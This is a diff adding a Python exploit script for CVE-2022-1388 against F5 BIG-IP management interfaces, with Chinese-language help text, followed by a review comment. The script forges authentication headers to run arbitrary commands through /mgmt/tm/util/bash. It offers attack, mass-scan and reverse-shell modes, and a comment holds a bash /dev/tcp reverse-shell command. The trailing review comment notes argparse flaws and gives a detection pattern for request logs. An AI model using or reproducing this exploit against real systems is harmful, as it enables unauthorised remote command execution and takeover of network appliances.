1 + #!/usr/bin/python3.9 2 + # -*- coding: utf-8 -*- 3 + # 4 + # Copyright (C) 2021 Caps, Inc. All Rights Reserved 5 + # 6 + # @Time : 2022/5/9 16:52 7 + # @Author : Caps 8 + # @Email : [email protected] 9 + # @File : CVE-2022-1388.py 10 + # @Software: PyCharm 11 + import requests 12 + import sys 13 + import argparse 14 + import json 15 + import time 16 + from requests.packages.urllib3.exceptions import InsecureRequestWarning 17 + 18 + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 19 + 20 + t = int(time.time()) 21 + 22 + 23 + def title(): 24 + print(''' 25 + _____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____ 26 + / __ \| | | || ___| / __ \| _ |/ __ \/ __ \ / | |____ || _ || _ | 27 + | / \/| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / \ V / \ V / 28 + | | | | | || __||______| / / | /| | / / / / |______|| | \ \ / _ \ / _ \ 29 + | \__/\\ \_/ /| |___ ./ /___\ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| | 30 + \____/ \___/ \____/ \_____/ \___/ \_____/\_____/ \___/\____/ \_____/\_____/ 31 + Author:[email protected] 32 + Github:https://github.com/bytecaps 33 + ''') 34 + print(''' 35 + 验证模式:python CVE_2022_1388.py -v true -u target_url 36 + 攻击模式:python CVE_2022_1388.py -a true -u target_url -c command 37 + 批量检测:python CVE_2022_1388.py -s true -f file 38 + 反弹模式:python CVE_2022_1388.py -r true -u target_url -c command 39 + ''') 40 + 41 + 42 + def headers(): 43 + headers = { 44 + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 45 + 'Content-Type': 'application/json', 46 + 'Connection': 'keep-alive, x-F5-Auth-Token', 47 + 'X-F5-Auth-Token': 'a', 48 + 'Authorization': 'Basic YWRtaW46' 49 + } 50 + return headers 51 + 52 + 53 + def check(target_url): 54 + check_url = target_url + '/mgmt/tm/util/bash' 55 + data = {'command': "run", 'utilCmdArgs': "-c id"} 56 + try: 57 + response = requests.post(url=check_url, json=data, headers=headers(), verify=False, 
timeout=5) 58 + if response.status_code == 200 and 'commandResult' in response.text: 59 + print("[+] 目标 {} 存在漏洞".format(target_url)) 60 + else: 61 + print("[-] 目标 {} 不存在漏洞".format(target_url)) 62 + except Exception as e: 63 + print('url 访问异常 {0}'.format(target_url)) 64 + 65 + 66 + def attack(target_url, cmd): 67 + attack_url = target_url + '/mgmt/tm/util/bash' 68 + data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)} 69 + try: 70 + response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5) 71 + if response.status_code == 200 and 'commandResult' in response.text: 72 + default = json.loads(response.text) 73 + display = default['commandResult'] 74 + print("[+] 目标 {} 存在漏洞".format(target_url)) 75 + print('[+] 响应为:{0}'.format(display)) 76 + else: 77 + print("[-] 目标 {} 不存在漏洞".format(target_url)) 78 + except Exception as e: 79 + print('url 访问异常 {0}'.format(target_url)) 80 + 81 + 82 + def reverse_shell(target_url, command): 83 + reverse_url = target_url + '/mgmt/tm/util/bash' 84 + data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)} 85 + # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1 86 + try: 87 + requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5) 88 + except Exception as e: 89 + print("[+] 请自行查看是否反弹shell回来") 90 + 91 + 92 + def scan(file): 93 + for url_link in open(file, 'r', encoding='utf-8'): 94 + if url_link.strip() != '': 95 + url_path = format_url(url_link.strip()) 96 + check(url_path) 97 + 98 + 99 + def format_url(url): 100 + try: 101 + if url[:4] != "http": 102 + url = "https://" + url 103 + url = url.strip() 104 + return url 105 + except Exception as e: 106 + print('URL 错误 {0}'.format(url)) 107 + 108 + 109 + def main(): 110 + parser = argparse.ArgumentParser("F5 Big-IP RCE") 111 + parser.add_argument('-v', '--verify', type=bool, help=' 验证模式 ') 112 + parser.add_argument('-u', '--url', type=str, help=' 目标URL ') 113 + 114 + parser.add_argument('-a', '--attack', 
type=bool, help=' 攻击模式 ') 115 + parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ') 116 + 117 + parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ') 118 + parser.add_argument('-f', '--file', type=str, help=' 文件路径 ') 119 + 120 + parser.add_argument('-r', '--shell', type=bool, help=' 反弹shell模式 ') 121 + args = parser.parse_args() 122 + 123 + verify_model = args.verify 124 + url = args.url 125 + 126 + attack_model = args.attack 127 + command = args.command 128 + 129 + scan_model = args.scan 130 + file = args.file 131 + 132 + shell_model = args.shell 133 + 134 + if verify_model is True and url is not None: 135 + check(url) 136 + elif attack_model is True and url is not None and command is not None: 137 + attack(url, command) 138 + elif scan_model is True and file is not None: 139 + scan(file) 140 + elif shell_model is True and url is not None and command is not None: 141 + reverse_shell(url, command) 142 + else: 143 + sys.exit(0) 144 + 145 + 146 + if __name__ == '__main__': 147 + title() 148 + main() 149 +
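Review bot: The mode switches in main() are declared with `type=bool`, and argparse applies `bool()` to the raw argument string, so `-v false` or `-s false` still evaluates to True and the script sends its request; in check() that request runs `id` on the target, so the "verify" mode is an active check, not a passive probe. Declaring the switches as `parser.add_argument('-v', '--verify', action='store_true', help=' 验证模式 ')` (likewise for `-a`, `-s`, `-r`) makes omitting the flag the only way to get False, and the usage text in title() would then drop the trailing `true`. Separately, check() and attack() catch bare `Exception` and print the same "url 访问异常" line for timeouts, TLS errors and JSON failures alike, and every other response is reported as not vulnerable, so a negative result from this script should not be read as evidence that a device is patched. On the detection side, headers() sends a fixed request shape: a POST to `/mgmt/tm/util/bash` carrying `Connection: keep-alive, x-F5-Auth-Token` together with `Authorization: Basic YWRtaW46`, which is the pattern to search for in request logs of the management interface.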